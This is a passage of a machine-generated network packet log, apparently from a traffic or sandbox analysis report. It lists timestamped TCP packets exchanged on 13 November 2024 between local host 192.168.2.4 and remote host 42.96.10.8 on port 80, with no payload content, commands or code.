                                                                                                                                                                                                            Nov 13, 2024 13:25:17.420836926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.420871973 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.420874119 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.420911074 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.420995951 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.473464966 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.473536015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.473572969 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.473608017 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.473623991 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.473648071 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.473731995 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.490398884 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.490433931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.490470886 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.490514040 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.490516901 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.490545034 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.490551949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.490705967 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.491229057 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.491375923 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.491406918 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.491449118 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.491481066 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.491544962 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.491565943 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.491599083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.491635084 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.491667986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.491703033 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.491704941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.491738081 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.491770029 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.491826057 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.491844893 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.491898060 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.491933107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.491967916 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.492003918 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.492022038 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.492022038 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.492041111 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.492074966 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.492108107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.492228985 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.492266893 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.492300987 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.492333889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.492362022 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.492422104 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.492455006 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.492491007 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.492543936 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.492567062 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.492579937 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.492614985 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.492635965 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.492649078 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.492681980 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.492710114 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.492887974 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.492943048 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.492975950 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.493005991 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.493032932 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.493072987 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.493127108 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.493179083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.493213892 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.493226051 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.493249893 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.493308067 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.493417978 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.493474007 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.493505955 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.493530989 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.493544102 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.493578911 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.493602037 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.495573044 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.536618948 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.536664009 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.536699057 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.536736965 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.536758900 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.537738085 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.588809013 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.589039087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.589080095 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.589114904 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.589149952 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.589184999 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.589195967 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.589195967 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.589232922 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.606528997 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.606580019 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.606616020 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.606630087 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.606652021 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.606688023 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.606724024 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.606769085 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.606769085 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.606976032 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.607012987 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.607068062 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.607100964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.607146025 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.607146025 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.607156992 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.607192039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.607227087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.607263088 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.607304096 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.607304096 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.607398987 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.607453108 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.607485056 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.607512951 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.607554913 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.607590914 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.607613087 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.607626915 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.607702971 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.607755899 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.607789040 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.607799053 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.607799053 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.607825994 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.607903957 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.607955933 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.607990980 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.608000994 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.608000994 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.608026028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.608062029 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.608314991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.608367920 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.608367920 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.608378887 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.608432055 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.608469963 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.608503103 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.608503103 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.608640909 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.608692884 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.608695984 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.608750105 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.608787060 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.608792067 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.608823061 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.608856916 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.608979940 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.609147072 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.609180927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.609215975 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.609253883 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.609288931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.609323025 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.609333992 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.609333992 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.609524012 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.609560013 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.609615088 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.609749079 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.652208090 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.652251959 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.652312040 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.652348042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.652379990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.652405024 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.652417898 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.652441978 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.657428980 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.705193043 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.705213070 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.705229044 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.705244064 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.705420017 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.705420971 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.721761942 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.721777916 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.721793890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.721807957 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.721823931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.721837044 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.721889019 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.721889019 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.722373009 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.722398043 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.722461939 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.722476006 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.722518921 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.722557068 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.722568989 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.722604036 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.722673893 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.722690105 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.722706079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.722712040 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.722712040 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.722821951 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.722835064 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.722868919 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.722868919 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.722873926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.722907066 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.722938061 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.722956896 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.723040104 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.723053932 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.723067999 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.723086119 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.723100901 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.723119020 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.723119020 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.723248005 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.723347902 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.723360062 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.723361015 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.723376989 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.723393917 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.723433018 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.723433018 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.723437071 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.723464966 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.723480940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.723519087 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.723519087 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.723690987 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.723718882 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.723735094 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.723750114 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.723795891 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.723795891 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.723830938 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.723874092 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.723890066 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.723929882 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.723944902 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.723990917 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.723990917 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.724184036 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.724200010 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.724215984 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.724261045 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.724261045 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.724278927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.724317074 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.724333048 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.724348068 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.724380016 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.724446058 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.727211952 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.727299929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.727320910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.727370977 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.727386951 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.727386951 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.727408886 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.727447987 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.727461100 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.767826080 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.767852068 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.767868042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.767882109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.767898083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.767913103 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.767966032 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.767966032 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.768618107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.768630981 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.771476030 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.820816040 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.820832014 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.820847034 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.820894957 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.820895910 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.837033033 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.837063074 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.837074995 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.837100029 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.837110996 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.837115049 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.837157011 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.837168932 CET804973342.96.10.8192.168.2.4
